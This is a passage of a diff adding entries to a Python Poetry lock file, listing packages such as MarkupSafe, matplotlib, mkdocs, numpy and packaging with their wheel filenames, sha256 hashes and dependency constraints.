+ {file = "MarkupSafe-2.1.5-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:3a57fdd7ce31c7ff06cdfbf31dafa96cc533c21e443d57f5b1ecc6cdc668ec7f"},
+ {file = "MarkupSafe-2.1.5-cp311-cp311-win32.whl", hash = "sha256:397081c1a0bfb5124355710fe79478cdbeb39626492b15d399526ae53422b906"},
+ {file = "MarkupSafe-2.1.5-cp311-cp311-win_amd64.whl", hash = "sha256:2b7c57a4dfc4f16f7142221afe5ba4e093e09e728ca65c51f5620c9aaeb9a617"},
+ {file = "MarkupSafe-2.1.5-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:8dec4936e9c3100156f8a2dc89c4b88d5c435175ff03413b443469c7c8c5f4d1"},
+ {file = "MarkupSafe-2.1.5-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:3c6b973f22eb18a789b1460b4b91bf04ae3f0c4234a0a6aa6b0a92f6f7b951d4"},
+ {file = "MarkupSafe-2.1.5-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ac07bad82163452a6884fe8fa0963fb98c2346ba78d779ec06bd7a6262132aee"},
+ {file = "MarkupSafe-2.1.5-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f5dfb42c4604dddc8e4305050aa6deb084540643ed5804d7455b5df8fe16f5e5"},
+ {file = "MarkupSafe-2.1.5-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:ea3d8a3d18833cf4304cd2fc9cbb1efe188ca9b5efef2bdac7adc20594a0e46b"},
+ {file = "MarkupSafe-2.1.5-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:d050b3361367a06d752db6ead6e7edeb0009be66bc3bae0ee9d97fb326badc2a"},
+ {file = "MarkupSafe-2.1.5-cp312-cp312-musllinux_1_1_i686.whl", hash = "sha256:bec0a414d016ac1a18862a519e54b2fd0fc8bbfd6890376898a6c0891dd82e9f"},
+ {file = "MarkupSafe-2.1.5-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:58c98fee265677f63a4385256a6d7683ab1832f3ddd1e66fe948d5880c21a169"},
+ {file = "MarkupSafe-2.1.5-cp312-cp312-win32.whl", hash = "sha256:8590b4ae07a35970728874632fed7bd57b26b0102df2d2b233b6d9d82f6c62ad"},
+ {file = "MarkupSafe-2.1.5-cp312-cp312-win_amd64.whl", hash = "sha256:823b65d8706e32ad2df51ed89496147a42a2a6e01c13cfb6ffb8b1e92bc910bb"},
+ {file = "MarkupSafe-2.1.5-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:c8b29db45f8fe46ad280a7294f5c3ec36dbac9491f2d1c17345be8e69cc5928f"},
+ {file = "MarkupSafe-2.1.5-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ec6a563cff360b50eed26f13adc43e61bc0c04d94b8be985e6fb24b81f6dcfdf"},
+ {file = "MarkupSafe-2.1.5-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a549b9c31bec33820e885335b451286e2969a2d9e24879f83fe904a5ce59d70a"},
+ {file = "MarkupSafe-2.1.5-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:4f11aa001c540f62c6166c7726f71f7573b52c68c31f014c25cc7901deea0b52"},
+ {file = "MarkupSafe-2.1.5-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:7b2e5a267c855eea6b4283940daa6e88a285f5f2a67f2220203786dfa59b37e9"},
+ {file = "MarkupSafe-2.1.5-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:2d2d793e36e230fd32babe143b04cec8a8b3eb8a3122d2aceb4a371e6b09b8df"},
+ {file = "MarkupSafe-2.1.5-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:ce409136744f6521e39fd8e2a24c53fa18ad67aa5bc7c2cf83645cce5b5c4e50"},
+ {file = "MarkupSafe-2.1.5-cp37-cp37m-win32.whl", hash = "sha256:4096e9de5c6fdf43fb4f04c26fb114f61ef0bf2e5604b6ee3019d51b69e8c371"},
+ {file = "MarkupSafe-2.1.5-cp37-cp37m-win_amd64.whl", hash = "sha256:4275d846e41ecefa46e2015117a9f491e57a71ddd59bbead77e904dc02b1bed2"},
+ {file = "MarkupSafe-2.1.5-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:656f7526c69fac7f600bd1f400991cc282b417d17539a1b228617081106feb4a"},
+ {file = "MarkupSafe-2.1.5-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:97cafb1f3cbcd3fd2b6fbfb99ae11cdb14deea0736fc2b0952ee177f2b813a46"},
+ {file = "MarkupSafe-2.1.5-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1f3fbcb7ef1f16e48246f704ab79d79da8a46891e2da03f8783a5b6fa41a9532"},
+ {file = "MarkupSafe-2.1.5-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:fa9db3f79de01457b03d4f01b34cf91bc0048eb2c3846ff26f66687c2f6d16ab"},
+ {file = "MarkupSafe-2.1.5-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:ffee1f21e5ef0d712f9033568f8344d5da8cc2869dbd08d87c84656e6a2d2f68"},
+ {file = "MarkupSafe-2.1.5-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:5dedb4db619ba5a2787a94d877bc8ffc0566f92a01c0ef214865e54ecc9ee5e0"},
+ {file = "MarkupSafe-2.1.5-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:30b600cf0a7ac9234b2638fbc0fb6158ba5bdcdf46aeb631ead21248b9affbc4"},
+ {file = "MarkupSafe-2.1.5-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:8dd717634f5a044f860435c1d8c16a270ddf0ef8588d4887037c5028b859b0c3"},
+ {file = "MarkupSafe-2.1.5-cp38-cp38-win32.whl", hash = "sha256:daa4ee5a243f0f20d528d939d06670a298dd39b1ad5f8a72a4275124a7819eff"},
+ {file = "MarkupSafe-2.1.5-cp38-cp38-win_amd64.whl", hash = "sha256:619bc166c4f2de5caa5a633b8b7326fbe98e0ccbfacabd87268a2b15ff73a029"},
+ {file = "MarkupSafe-2.1.5-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:7a68b554d356a91cce1236aa7682dc01df0edba8d043fd1ce607c49dd3c1edcf"},
+ {file = "MarkupSafe-2.1.5-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:db0b55e0f3cc0be60c1f19efdde9a637c32740486004f20d1cff53c3c0ece4d2"},
+ {file = "MarkupSafe-2.1.5-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3e53af139f8579a6d5f7b76549125f0d94d7e630761a2111bc431fd820e163b8"},
+ {file = "MarkupSafe-2.1.5-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:17b950fccb810b3293638215058e432159d2b71005c74371d784862b7e4683f3"},
+ {file = "MarkupSafe-2.1.5-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:4c31f53cdae6ecfa91a77820e8b151dba54ab528ba65dfd235c80b086d68a465"},
+ {file = "MarkupSafe-2.1.5-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:bff1b4290a66b490a2f4719358c0cdcd9bafb6b8f061e45c7a2460866bf50c2e"},
+ {file = "MarkupSafe-2.1.5-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:bc1667f8b83f48511b94671e0e441401371dfd0f0a795c7daa4a3cd1dde55bea"},
+ {file = "MarkupSafe-2.1.5-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:5049256f536511ee3f7e1b3f87d1d1209d327e818e6ae1365e8653d7e3abb6a6"},
+ {file = "MarkupSafe-2.1.5-cp39-cp39-win32.whl", hash = "sha256:00e046b6dd71aa03a41079792f8473dc494d564611a8f89bbbd7cb93295ebdcf"},
+ {file = "MarkupSafe-2.1.5-cp39-cp39-win_amd64.whl", hash = "sha256:fa173ec60341d6bb97a89f5ea19c85c5643c1e7dedebc22f5181eb73573142c5"},
+ {file = "MarkupSafe-2.1.5.tar.gz", hash = "sha256:d283d37a890ba4c1ae73ffadf8046435c76e7bc2247bbb63c00bd1a709c6544b"},
+]
+
+[[package]]
+name = "matplotlib"
+version = "3.7.5"
+description = "Python plotting package"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "matplotlib-3.7.5-cp310-cp310-macosx_10_12_universal2.whl", hash = "sha256:4a87b69cb1cb20943010f63feb0b2901c17a3b435f75349fd9865713bfa63925"},
+ {file = "matplotlib-3.7.5-cp310-cp310-macosx_10_12_x86_64.whl", hash = "sha256:d3ce45010fefb028359accebb852ca0c21bd77ec0f281952831d235228f15810"},
+ {file = "matplotlib-3.7.5-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:fbea1e762b28400393d71be1a02144aa16692a3c4c676ba0178ce83fc2928fdd"},
+ {file = "matplotlib-3.7.5-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ec0e1adc0ad70ba8227e957551e25a9d2995e319c29f94a97575bb90fa1d4469"},
+ {file = "matplotlib-3.7.5-cp310-cp310-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6738c89a635ced486c8a20e20111d33f6398a9cbebce1ced59c211e12cd61455"},
+ {file = "matplotlib-3.7.5-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1210b7919b4ed94b5573870f316bca26de3e3b07ffdb563e79327dc0e6bba515"},
+ {file = "matplotlib-3.7.5-cp310-cp310-win32.whl", hash = "sha256:068ebcc59c072781d9dcdb82f0d3f1458271c2de7ca9c78f5bd672141091e9e1"},
+ {file = "matplotlib-3.7.5-cp310-cp310-win_amd64.whl", hash = "sha256:f098ffbaab9df1e3ef04e5a5586a1e6b1791380698e84938d8640961c79b1fc0"},
+ {file = "matplotlib-3.7.5-cp311-cp311-macosx_10_12_universal2.whl", hash = "sha256:f65342c147572673f02a4abec2d5a23ad9c3898167df9b47c149f32ce61ca078"},
+ {file = "matplotlib-3.7.5-cp311-cp311-macosx_10_12_x86_64.whl", hash = "sha256:4ddf7fc0e0dc553891a117aa083039088d8a07686d4c93fb8a810adca68810af"},
+ {file = "matplotlib-3.7.5-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:0ccb830fc29442360d91be48527809f23a5dcaee8da5f4d9b2d5b867c1b087b8"},
+ {file = "matplotlib-3.7.5-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:efc6bb28178e844d1f408dd4d6341ee8a2e906fc9e0fa3dae497da4e0cab775d"},
+ {file = "matplotlib-3.7.5-cp311-cp311-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:3b15c4c2d374f249f324f46e883340d494c01768dd5287f8bc00b65b625ab56c"},
+ {file = "matplotlib-3.7.5-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3d028555421912307845e59e3de328260b26d055c5dac9b182cc9783854e98fb"},
+ {file = "matplotlib-3.7.5-cp311-cp311-win32.whl", hash = "sha256:fe184b4625b4052fa88ef350b815559dd90cc6cc8e97b62f966e1ca84074aafa"},
+ {file = "matplotlib-3.7.5-cp311-cp311-win_amd64.whl", hash = "sha256:084f1f0f2f1010868c6f1f50b4e1c6f2fb201c58475494f1e5b66fed66093647"},
+ {file = "matplotlib-3.7.5-cp312-cp312-macosx_10_12_universal2.whl", hash = "sha256:34bceb9d8ddb142055ff27cd7135f539f2f01be2ce0bafbace4117abe58f8fe4"},
+ {file = "matplotlib-3.7.5-cp312-cp312-macosx_10_12_x86_64.whl", hash = "sha256:c5a2134162273eb8cdfd320ae907bf84d171de948e62180fa372a3ca7cf0f433"},
+ {file = "matplotlib-3.7.5-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:039ad54683a814002ff37bf7981aa1faa40b91f4ff84149beb53d1eb64617980"},
+ {file = "matplotlib-3.7.5-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4d742ccd1b09e863b4ca58291728db645b51dab343eebb08d5d4b31b308296ce"},
+ {file = "matplotlib-3.7.5-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:743b1c488ca6a2bc7f56079d282e44d236bf375968bfd1b7ba701fd4d0fa32d6"},
+ {file = "matplotlib-3.7.5-cp312-cp312-win_amd64.whl", hash = "sha256:fbf730fca3e1f23713bc1fae0a57db386e39dc81ea57dc305c67f628c1d7a342"},
+ {file = "matplotlib-3.7.5-cp38-cp38-macosx_10_12_universal2.whl", hash = "sha256:cfff9b838531698ee40e40ea1a8a9dc2c01edb400b27d38de6ba44c1f9a8e3d2"},
+ {file = "matplotlib-3.7.5-cp38-cp38-macosx_10_12_x86_64.whl", hash = "sha256:1dbcca4508bca7847fe2d64a05b237a3dcaec1f959aedb756d5b1c67b770c5ee"},
+ {file = "matplotlib-3.7.5-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:4cdf4ef46c2a1609a50411b66940b31778db1e4b73d4ecc2eaa40bd588979b13"},
+ {file = "matplotlib-3.7.5-cp38-cp38-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:167200ccfefd1674b60e957186dfd9baf58b324562ad1a28e5d0a6b3bea77905"},
+ {file = "matplotlib-3.7.5-cp38-cp38-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:53e64522934df6e1818b25fd48cf3b645b11740d78e6ef765fbb5fa5ce080d02"},
+ {file = "matplotlib-3.7.5-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d3e3bc79b2d7d615067bd010caff9243ead1fc95cf735c16e4b2583173f717eb"},
+ {file = "matplotlib-3.7.5-cp38-cp38-win32.whl", hash = "sha256:6b641b48c6819726ed47c55835cdd330e53747d4efff574109fd79b2d8a13748"},
+ {file = "matplotlib-3.7.5-cp38-cp38-win_amd64.whl", hash = "sha256:f0b60993ed3488b4532ec6b697059897891927cbfc2b8d458a891b60ec03d9d7"},
+ {file = "matplotlib-3.7.5-cp39-cp39-macosx_10_12_universal2.whl", hash = "sha256:090964d0afaff9c90e4d8de7836757e72ecfb252fb02884016d809239f715651"},
+ {file = "matplotlib-3.7.5-cp39-cp39-macosx_10_12_x86_64.whl", hash = "sha256:9fc6fcfbc55cd719bc0bfa60bde248eb68cf43876d4c22864603bdd23962ba25"},
+ {file = "matplotlib-3.7.5-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:5e7cc3078b019bb863752b8b60e8b269423000f1603cb2299608231996bd9d54"},
+ {file = "matplotlib-3.7.5-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1e4e9a868e8163abaaa8259842d85f949a919e1ead17644fb77a60427c90473c"},
+ {file = "matplotlib-3.7.5-cp39-cp39-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:fa7ebc995a7d747dacf0a717d0eb3aa0f0c6a0e9ea88b0194d3a3cd241a1500f"},
+ {file = "matplotlib-3.7.5-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3785bfd83b05fc0e0c2ae4c4a90034fe693ef96c679634756c50fe6efcc09856"},
+ {file = "matplotlib-3.7.5-cp39-cp39-win32.whl", hash = "sha256:29b058738c104d0ca8806395f1c9089dfe4d4f0f78ea765c6c704469f3fffc81"},
+ {file = "matplotlib-3.7.5-cp39-cp39-win_amd64.whl", hash = "sha256:fd4028d570fa4b31b7b165d4a685942ae9cdc669f33741e388c01857d9723eab"},
+ {file = "matplotlib-3.7.5-pp38-pypy38_pp73-macosx_10_12_x86_64.whl", hash = "sha256:2a9a3f4d6a7f88a62a6a18c7e6a84aedcaf4faf0708b4ca46d87b19f1b526f88"},
+ {file = "matplotlib-3.7.5-pp38-pypy38_pp73-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:b9b3fd853d4a7f008a938df909b96db0b454225f935d3917520305b90680579c"},
+ {file = "matplotlib-3.7.5-pp38-pypy38_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f0ad550da9f160737d7890217c5eeed4337d07e83ca1b2ca6535078f354e7675"},
+ {file = "matplotlib-3.7.5-pp38-pypy38_pp73-win_amd64.whl", hash = "sha256:20da7924a08306a861b3f2d1da0d1aa9a6678e480cf8eacffe18b565af2813e7"},
+ {file = "matplotlib-3.7.5-pp39-pypy39_pp73-macosx_10_12_x86_64.whl", hash = "sha256:b45c9798ea6bb920cb77eb7306409756a7fab9db9b463e462618e0559aecb30e"},
+ {file = "matplotlib-3.7.5-pp39-pypy39_pp73-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:a99866267da1e561c7776fe12bf4442174b79aac1a47bd7e627c7e4d077ebd83"},
+ {file = "matplotlib-3.7.5-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:2b6aa62adb6c268fc87d80f963aca39c64615c31830b02697743c95590ce3fbb"},
+ {file = "matplotlib-3.7.5-pp39-pypy39_pp73-win_amd64.whl", hash = "sha256:e530ab6a0afd082d2e9c17eb1eb064a63c5b09bb607b2b74fa41adbe3e162286"},
+ {file = "matplotlib-3.7.5.tar.gz", hash = "sha256:1e5c971558ebc811aa07f54c7b7c677d78aa518ef4c390e14673a09e0860184a"},
+]
+
+[package.dependencies]
+contourpy = ">=1.0.1"
+cycler = ">=0.10"
+fonttools = ">=4.22.0"
+importlib-resources = {version = ">=3.2.0", markers = "python_version < \"3.10\""}
+kiwisolver = ">=1.0.1"
+numpy = ">=1.20,<2"
+packaging = ">=20.0"
+pillow = ">=6.2.0"
+pyparsing = ">=2.3.1"
+python-dateutil = ">=2.7"
+
+[[package]]
+name = "mergedeep"
+version = "1.3.4"
+description = "A deep merge function for 🐍."
+optional = false
+python-versions = ">=3.6"
+files = [
+ {file = "mergedeep-1.3.4-py3-none-any.whl", hash = "sha256:70775750742b25c0d8f36c55aed03d24c3384d17c951b3175d898bd778ef0307"},
+ {file = "mergedeep-1.3.4.tar.gz", hash = "sha256:0096d52e9dad9939c3d975a774666af186eda617e6ca84df4c94dec30004f2a8"},
+]
+
+[[package]]
+name = "mkdocs"
+version = "1.5.3"
+description = "Project documentation with Markdown."
+optional = false
+python-versions = ">=3.7"
+files = [
+ {file = "mkdocs-1.5.3-py3-none-any.whl", hash = "sha256:3b3a78e736b31158d64dbb2f8ba29bd46a379d0c6e324c2246c3bc3d2189cfc1"},
+ {file = "mkdocs-1.5.3.tar.gz", hash = "sha256:eb7c99214dcb945313ba30426c2451b735992c73c2e10838f76d09e39ff4d0e2"},
+]
+
+[package.dependencies]
+click = ">=7.0"
+colorama = {version = ">=0.4", markers = "platform_system == \"Windows\""}
+ghp-import = ">=1.0"
+importlib-metadata = {version = ">=4.3", markers = "python_version < \"3.10\""}
+jinja2 = ">=2.11.1"
+markdown = ">=3.2.1"
+markupsafe = ">=2.0.1"
+mergedeep = ">=1.3.4"
+packaging = ">=20.5"
+pathspec = ">=0.11.1"
+platformdirs = ">=2.2.0"
+pyyaml = ">=5.1"
+pyyaml-env-tag = ">=0.1"
+watchdog = ">=2.0"
+
+[package.extras]
+i18n = ["babel (>=2.9.0)"]
+min-versions = ["babel (==2.9.0)", "click (==7.0)", "colorama (==0.4)", "ghp-import (==1.0)", "importlib-metadata (==4.3)", "jinja2 (==2.11.1)", "markdown (==3.2.1)", "markupsafe (==2.0.1)", "mergedeep (==1.3.4)", "packaging (==20.5)", "pathspec (==0.11.1)", "platformdirs (==2.2.0)", "pyyaml (==5.1)", "pyyaml-env-tag (==0.1)", "typing-extensions (==3.10)", "watchdog (==2.0)"]
+
+[[package]]
+name = "mkdocs-autorefs"
+version = "1.2.0"
+description = "Automatically link across pages in MkDocs."
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "mkdocs_autorefs-1.2.0-py3-none-any.whl", hash = "sha256:d588754ae89bd0ced0c70c06f58566a4ee43471eeeee5202427da7de9ef85a2f"},
+ {file = "mkdocs_autorefs-1.2.0.tar.gz", hash = "sha256:a86b93abff653521bda71cf3fc5596342b7a23982093915cb74273f67522190f"},
+]
+
+[package.dependencies]
+Markdown = ">=3.3"
+markupsafe = ">=2.0.1"
+mkdocs = ">=1.1"
+
+[[package]]
+name = "mkdocstrings"
+version = "0.26.1"
+description = "Automatic documentation from sources, for MkDocs."
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "mkdocstrings-0.26.1-py3-none-any.whl", hash = "sha256:29738bfb72b4608e8e55cc50fb8a54f325dc7ebd2014e4e3881a49892d5983cf"},
+ {file = "mkdocstrings-0.26.1.tar.gz", hash = "sha256:bb8b8854d6713d5348ad05b069a09f3b79edbc6a0f33a34c6821141adb03fe33"},
+]
+
+[package.dependencies]
+click = ">=7.0"
+importlib-metadata = {version = ">=4.6", markers = "python_version < \"3.10\""}
+Jinja2 = ">=2.11.1"
+Markdown = ">=3.6"
+MarkupSafe = ">=1.1"
+mkdocs = ">=1.4"
+mkdocs-autorefs = ">=1.2"
+platformdirs = ">=2.2"
+pymdown-extensions = ">=6.3"
+typing-extensions = {version = ">=4.1", markers = "python_version < \"3.10\""}
+
+[package.extras]
+crystal = ["mkdocstrings-crystal (>=0.3.4)"]
+python = ["mkdocstrings-python (>=0.5.2)"]
+python-legacy = ["mkdocstrings-python-legacy (>=0.2.1)"]
+
+[[package]]
+name = "mkdocstrings-python"
+version = "1.7.2"
+description = "A Python handler for mkdocstrings."
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "mkdocstrings_python-1.7.2-py3-none-any.whl", hash = "sha256:2d005729a90f1b86d6d71fad4953d787140996adec5b00a25fafc6ee48e1b79a"},
+ {file = "mkdocstrings_python-1.7.2.tar.gz", hash = "sha256:75b6af86f9dcdc2d864072d8fed5b1d45ad94dd2ce97843ef52ca87ad53d9b26"},
+]
+
+[package.dependencies]
+griffe = ">=0.35"
+mkdocstrings = ">=0.20"
+
+[[package]]
+name = "nodeenv"
+version = "1.9.1"
+description = "Node.js virtual environment builder"
+optional = false
+python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,!=3.5.*,!=3.6.*,>=2.7"
+files = [
+ {file = "nodeenv-1.9.1-py2.py3-none-any.whl", hash = "sha256:ba11c9782d29c27c70ffbdda2d7415098754709be8a7056d79a737cd901155c9"},
+ {file = "nodeenv-1.9.1.tar.gz", hash = "sha256:6ec12890a2dab7946721edbfbcd91f3319c6ccc9aec47be7c7e6b7011ee6645f"},
+]
+
+[[package]]
+name = "numpy"
+version = "1.24.4"
+description = "Fundamental package for array computing in Python"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "numpy-1.24.4-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:c0bfb52d2169d58c1cdb8cc1f16989101639b34c7d3ce60ed70b19c63eba0b64"},
+ {file = "numpy-1.24.4-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:ed094d4f0c177b1b8e7aa9cba7d6ceed51c0e569a5318ac0ca9a090680a6a1b1"},
+ {file = "numpy-1.24.4-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:79fc682a374c4a8ed08b331bef9c5f582585d1048fa6d80bc6c35bc384eee9b4"},
+ {file = "numpy-1.24.4-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7ffe43c74893dbf38c2b0a1f5428760a1a9c98285553c89e12d70a96a7f3a4d6"},
+ {file = "numpy-1.24.4-cp310-cp310-win32.whl", hash = "sha256:4c21decb6ea94057331e111a5bed9a79d335658c27ce2adb580fb4d54f2ad9bc"},
+ {file = "numpy-1.24.4-cp310-cp310-win_amd64.whl", hash = "sha256:b4bea75e47d9586d31e892a7401f76e909712a0fd510f58f5337bea9572c571e"},
+ {file = "numpy-1.24.4-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:f136bab9c2cfd8da131132c2cf6cc27331dd6fae65f95f69dcd4ae3c3639c810"},
+ {file = "numpy-1.24.4-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:e2926dac25b313635e4d6cf4dc4e51c8c0ebfed60b801c799ffc4c32bf3d1254"},
+ {file = "numpy-1.24.4-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:222e40d0e2548690405b0b3c7b21d1169117391c2e82c378467ef9ab4c8f0da7"},
+ {file = "numpy-1.24.4-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7215847ce88a85ce39baf9e89070cb860c98fdddacbaa6c0da3ffb31b3350bd5"},
+ {file = "numpy-1.24.4-cp311-cp311-win32.whl", hash = "sha256:4979217d7de511a8d57f4b4b5b2b965f707768440c17cb70fbf254c4b225238d"},
+ {file = "numpy-1.24.4-cp311-cp311-win_amd64.whl", hash = "sha256:b7b1fc9864d7d39e28f41d089bfd6353cb5f27ecd9905348c24187a768c79694"},
+ {file = "numpy-1.24.4-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:1452241c290f3e2a312c137a9999cdbf63f78864d63c79039bda65ee86943f61"},
+ {file = "numpy-1.24.4-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:04640dab83f7c6c85abf9cd729c5b65f1ebd0ccf9de90b270cd61935eef0197f"},
+ {file = "numpy-1.24.4-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a5425b114831d1e77e4b5d812b69d11d962e104095a5b9c3b641a218abcc050e"},
+ {file = "numpy-1.24.4-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:dd80e219fd4c71fc3699fc1dadac5dcf4fd882bfc6f7ec53d30fa197b8ee22dc"},
+ {file = "numpy-1.24.4-cp38-cp38-win32.whl", hash = "sha256:4602244f345453db537be5314d3983dbf5834a9701b7723ec28923e2889e0bb2"},
+ {file = "numpy-1.24.4-cp38-cp38-win_amd64.whl", hash = "sha256:692f2e0f55794943c5bfff12b3f56f99af76f902fc47487bdfe97856de51a706"},
+ {file = "numpy-1.24.4-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:2541312fbf09977f3b3ad449c4e5f4bb55d0dbf79226d7724211acc905049400"},
+ {file = "numpy-1.24.4-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:9667575fb6d13c95f1b36aca12c5ee3356bf001b714fc354eb5465ce1609e62f"},
+ {file = "numpy-1.24.4-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f3a86ed21e4f87050382c7bc96571755193c4c1392490744ac73d660e8f564a9"},
+ {file = "numpy-1.24.4-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d11efb4dbecbdf22508d55e48d9c8384db795e1b7b51ea735289ff96613ff74d"},
+ {file = "numpy-1.24.4-cp39-cp39-win32.whl", hash = "sha256:6620c0acd41dbcb368610bb2f4d83145674040025e5536954782467100aa8835"},
+ {file = "numpy-1.24.4-cp39-cp39-win_amd64.whl", hash = "sha256:befe2bf740fd8373cf56149a5c23a0f601e82869598d41f8e188a0e9869926f8"},
+ {file = "numpy-1.24.4-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:31f13e25b4e304632a4619d0e0777662c2ffea99fcae2029556b17d8ff958aef"},
+ {file = "numpy-1.24.4-pp38-pypy38_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:95f7ac6540e95bc440ad77f56e520da5bf877f87dca58bd095288dce8940532a"},
+ {file = "numpy-1.24.4-pp38-pypy38_pp73-win_amd64.whl", hash = "sha256:e98f220aa76ca2a977fe435f5b04d7b3470c0a2e6312907b37ba6068f26787f2"},
+ {file = "numpy-1.24.4.tar.gz", hash = "sha256:80f5e3a4e498641401868df4208b74581206afbee7cf7b8329daae82676d9463"},
+]
+
+[[package]]
+name = "openpyxl"
+version = "3.1.5"
+description = "A Python library to read/write Excel 2010 xlsx/xlsm files"
+optional = true
+python-versions = ">=3.8"
+files = [
+ {file = "openpyxl-3.1.5-py2.py3-none-any.whl", hash = "sha256:5282c12b107bffeef825f4617dc029afaf41d0ea60823bbb665ef3079dc79de2"},
+ {file = "openpyxl-3.1.5.tar.gz", hash = "sha256:cf0e3cf56142039133628b5acffe8ef0c12bc902d2aadd3e0fe5878dc08d1050"},
+]
+
+[package.dependencies]
+et-xmlfile = "*"
+
+[[package]]
+name = "packaging"
+version = "24.2"
+description = "Core utilities for Python packages"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "packaging-24.2-py3-none-any.whl", hash = "sha256:09abb1bccd265c01f4a3aa3f7a7db064b36514d2cba19a2f694fe6150451a759"},
+ {file = "packaging-24.2.tar.gz", hash = "sha256:c228a6dc5e932d346bc5739379109d49e8853dd8223571c7c5b55260edc0b97f"},
+]
+
+[[package]]
+name = "pandas"
+version = "2.0.3"
+description = "Powerful data structures for data analysis, time series, and statistics"
+optional = false
+python-versions = ">=3.8"
+files = [
